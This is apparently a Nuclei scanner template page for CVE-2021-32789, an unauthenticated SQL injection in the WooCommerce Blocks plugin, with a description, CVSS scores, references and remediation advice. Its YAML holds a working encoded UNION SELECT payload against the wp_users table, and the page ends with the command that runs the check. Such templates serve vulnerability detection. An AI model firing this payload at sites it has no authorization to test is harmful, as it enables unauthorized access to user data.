WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection
ID: CVE-2021-32789
Severity: high
Author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
Tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic
Description
Section titled “Description”woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the wc/store/products/collection-data?calculate_attribute_counts[][taxonomy] endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
YAML Source
Section titled “YAML Source”id: CVE-2021-32789
info: name: WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: high description: | woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system. remediation: | Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability. reference: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a - https://nvd.nist.gov/vuln/detail/CVE-2021-32789 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-32789 cwe-id: CWE-89 epss-score: 0.09336 epss-percentile: 0.94559 cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: automattic product: woocommerce_blocks framework: wordpress tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic
http: - method: GET path: - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
matchers-condition: and matchers: - type: word words: - 'sqli-test' - 'attribute_counts' - 'price_range' - 'term' condition: and
- type: word part: header words: - 'application/json'
- type: status status: - 200# digest: 4a0a00473045022034e5bd0723da107634d96b959c236cb09561eb5ecd77af885c183904e0a8cc56022100df5180a952a6dc407d90562060ad4152df214721e91ae4e62962f76873385f27:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-32789.yaml"